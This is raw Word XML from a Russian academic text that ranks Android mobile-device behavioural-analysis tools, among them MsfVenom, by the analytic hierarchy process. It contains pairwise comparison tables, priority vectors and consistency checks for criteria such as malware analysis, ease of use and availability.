        <w:t>Вычисление вектора приоритетов альтернатив по критерию возможности анализа действий пользователя представлен</w:t>
      </w:r>
      <w:r w:rsidR="00DE569F">
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в таблице 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="00354ED1">
        <w:t>– Парное сравнение по анализу действий пользователя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8638DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top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tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>MsfVenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="00531F4B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>П</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="005E7E20" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>Локальный приоритет</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tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>2,080084</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,593634</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1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>2,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,87358</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,249311</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0,50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,550321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>0,157056</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009915DA" w:rsidTr="00DD4C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom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bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,67</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>4,50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>6,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>3,50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="009915DA" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD4C25" w:rsidTr="00DD4C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DD4C25" w:rsidRPr="00D6635B" w:rsidRDefault="00DD4C25" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0019431F"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F870DF"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DD4C25">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19431F" w:rsidRDefault="009C6151" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Следовательно, оценка проведена корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C6151" w:rsidRDefault="009C6151" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="002E3820">
        <w:t>пределим</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вектора </w:t>
      </w:r>
      <w:r w:rsidR="002E3820">
        <w:t>приоритетов средств проведения поведенческого анализа функционирования МПУ на ОС андроид по критерию возможности анализа предположительно вредоносного ПО (таблица 8).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00354ED1">
        <w:t xml:space="preserve"> – Определение приоритетов по возможности проведения анализа МПУ на наличие вредоносного ПО</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0,341995</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0,090909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3,76</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F870DF"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3</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009C6151" w:rsidRDefault="009C6151" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Следовательно, оценка проведена корректно</w:t>
      </w:r>
      <w:r w:rsidR="002E3820">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3820" w:rsidRDefault="002E3820" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В таблице 9 представлено сравнение средств поведенческого анализа МПУ по по фактору нейтральности сервиса для антивирусных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>9</w:t>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color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>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5,00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0,497946</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1,259921</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0,36689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0,464159</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0,135163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Pr>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8,00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3,43</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lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF733B">
              <w:rPr>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F870DF"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3,094015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0,047008</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0,081048</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009C6151" w:rsidRDefault="009C6151" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Следовательно, оценка проведена корректно</w:t>
      </w:r>
      <w:r w:rsidR="002E3820">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3820" w:rsidRDefault="00DE569F" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Оценим простоту использования альтернатив в таблице 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="00354ED1">
        <w:t>– Парное сравнение по простоте использования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478" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="00531F4B" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>П</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00D6635B" w:rsidRDefault="005E7E20" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6635B">
              <w:t>Локальный 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3,00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7,00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2,758924</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0,65863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0,33</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1,100642</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0,262753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0,14</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0,329317</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0,078617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1,48</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4,19</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1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008638DD" w:rsidTr="009C6151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1540" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1478" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1585" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00D6635B" w:rsidRDefault="008638DD" w:rsidP="00DF6765">
            <w:pPr>
              <w:pStyle w:val="aff2"/>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F870DF"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3,032367</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0,016183</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0,027902</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Вычисление вектора приоритетов альтернатив по критерию устойчивости к нестабильному соединению представлено в таблице 11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r w:rsidR="00354ED1">
        <w:t>–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2,620741</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0,582022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1,650964</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0,366651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0,23112</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0,051328</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3,11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4,50</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F870DF"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w:lastRenderedPageBreak/>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9C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Вычисление вектора приоритетов альтернатив по доступности представлено в таблице 12.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354ED1" w:rsidRPr="00354ED1" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>12</w:t>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8638DD">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0,11</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0,264567</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0,063571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1,817121</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0,436622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9,00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2,080084</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0,499807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2,11</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4,16</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8638DD">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F870DF"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3,018295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0,009147</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0,015771</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Определим вектора приоритетов средств проведения поведенческого анализа функционирования МПУ на ОС андроид по критерию корректности работы (таблица 13).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009915DA" w:rsidRPr="009915DA" w:rsidRDefault="0019431F" w:rsidP="00D6635B">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>13</w:t>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F870DF" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>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585" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009915DA" w:rsidRPr="00962B68" w:rsidRDefault="005E7E20" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Л</w:t>
            </w:r>
            <w:r w:rsidRPr="00962B68">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">окальный </w:t>
            </w:r>
            <w:r>
              <w:rPr>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rPr>
          <w:trHeight w:val="70"/>
        </w:trPr>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1,587401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9915DA">
              <w:rPr>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3,17</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color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009915DA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1,00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008638DD" w:rsidTr="009C6151">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="009915DA" w:rsidRDefault="008638DD" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>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color w:val="000000"/>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F870DF"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w:lastRenderedPageBreak/>
                  <m:t>ОС=</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>0</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009915DA" w:rsidRDefault="009C6151" w:rsidP="009C6151">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Следовательно, оценка проведена корректно</w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t>.</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по формуле 4 вычислим элементы вектора гл</w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>обального приоритета</w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t xml:space="preserve"> по формуле 5.</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78129C" w:rsidTr="00547371">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="00F870DF" w:rsidP="0078129C">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="0078129C">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00151270" w:rsidRDefault="00151270" w:rsidP="0078129C">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">где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Pr="00151270">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">значение элемента вектора локальных приоритетов, соответствующий </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">-ой альтернативе и </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00151270">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>ому критерию</w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t>;</w:t>
      </w:r>
    </w:p>
